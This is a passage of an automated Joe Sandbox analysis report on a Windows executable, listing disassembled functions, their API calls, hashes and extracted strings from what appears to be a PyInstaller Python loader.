                                                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                                                  • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                  • Instruction ID: 4a845607282e17f4a483a487e092a201656256254044ab6ab78e4d0b38d8c084
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBB1E622B1868241EE62EB219C011B9E362FB64BF4F945533D95D07B99EF3CE445CB10
                                                                                                                                                                                                                                  Function 00007FF72C675E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EAA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675EBB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675ECC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C6755C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755DC
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3458911817-0
                                                                                                                                                                                                                                  • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                  • Instruction ID: 807c0db034e7fbf72cd21f584035cc2bff27495446651293bd15c873eb4c4583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4551B132A0864286E711FF21DD821A9E362FF687A4FC44576EA0D43696DF3CE444CF60
                                                                                                                                                                                                                                  Function 00007FF72C65D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                  • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction ID: 9497ebfe237829fba5ad6f0ae8ddd71a8962e52b33c5ec32f40ebd45b48d8dda
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7114C36B14B068AEB009F60EC452B973A4FB69768F840E31DA2D467A4DF78D1688750
                                                                                                                                                                                                                                  Function 00007FF72C673480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                  • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                  • Instruction ID: b3cc970fe281f182c87d7858b05a87be79a881b4141bd7f19f62f17039dadd30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27B09220E1BA02C2EA0A3B216C8722862A6FFA8720FD801B8C01D41330DE2C25E95B21
                                                                                                                                                                                                                                  Function 00007FF72C679570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                  • Instruction ID: e7f8bdc5ffaa5a511b05a27265d9a75b1630445223ef41b344fdc5b32336cfb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF068717182A58BDB99DF69A84262977D1F7183D0F9480B9D68D83B04DA3CD1518F14
                                                                                                                                                                                                                                  Function 00007FF72C65D30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                  • Instruction ID: 8fe0a5c0466e038783a2413c14aad32eb35110ec0842fe12b6483e9d271176e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A00231D0DC0BD0E646AB00ED91035A332FBB5368BD00471E21E514F0AF3CA448DB60
                                                                                                                                                                                                                                  Function 00007FF72C655830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655840
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655852
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655889
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65589B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558B4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558C6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558DF
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558F1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65590D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65591F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65593B
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65594D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655969
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65597B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655997
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559C5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                  • API String ID: 199729137-653951865
                                                                                                                                                                                                                                  • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction ID: eda8e9cb84964693718dd253f66033653bfa142b70d2fc38ce5af5868362422b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B22B164A09F07A1FA47BB55AC1A5B4A3A3FF647B1BE41835C51E02260FF3CA54D8F24
                                                                                                                                                                                                                                  Function 00007FF72C6581D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF72C6586B7,?,?,00000000,00007FF72C653CBB), ref: 00007FF72C65822C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                  • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                  • Instruction ID: 7ef42902bd1cde71f8c84e3eb85ebb2b6a6ae9d11e0d93f16cb01c3d8ab3ec0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B518611A1C64281FA52BB65DC552B9E352FFB87E0FE44831D70E42AD5EE3CE5088F60
                                                                                                                                                                                                                                  Function 00007FF72C652180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                  • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction ID: c856e71026625c4dcf53e9d161458fe9742495b3ee8c397dc4c6480bcee77c74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151E9366047A186D6349F36E4181BAF7A2FBA8B65F404125EFDE43694DF3CD045DB20
                                                                                                                                                                                                                                  Function 00007FF72C6580C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                  • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                  • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                  • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction ID: c43abbecf4a9d3081e3c19240c48d32a48b423849fa415f034b3ea1467b0ae38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66218821B08A4381E7526B7AFC45179A352FFA8BF0F984531DB1D437D8DE2CD5958B20
                                                                                                                                                                                                                                  Function 00007FF72C666290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                  • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction ID: d6145e58236951280cdc39b865d6008e905f2ee23aaf1e4de42334ebbbf37fb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B127061E0824386FB227A15F954279F6B3FB60764FE4813DE68A466C4DF7CE5808F21
                                                                                                                                                                                                                                  Function 00007FF72C660FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                  • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction ID: 808a7fa6049103a88b91e57bc9f78050900597928f8c3b4ea897a958b3d5c613
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17127461E0C14386FB21BA15EC54679F6B3FBA0764FE44039D69A47AC4DB7CE4808F60
                                                                                                                                                                                                                                  Function 00007FF72C651050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
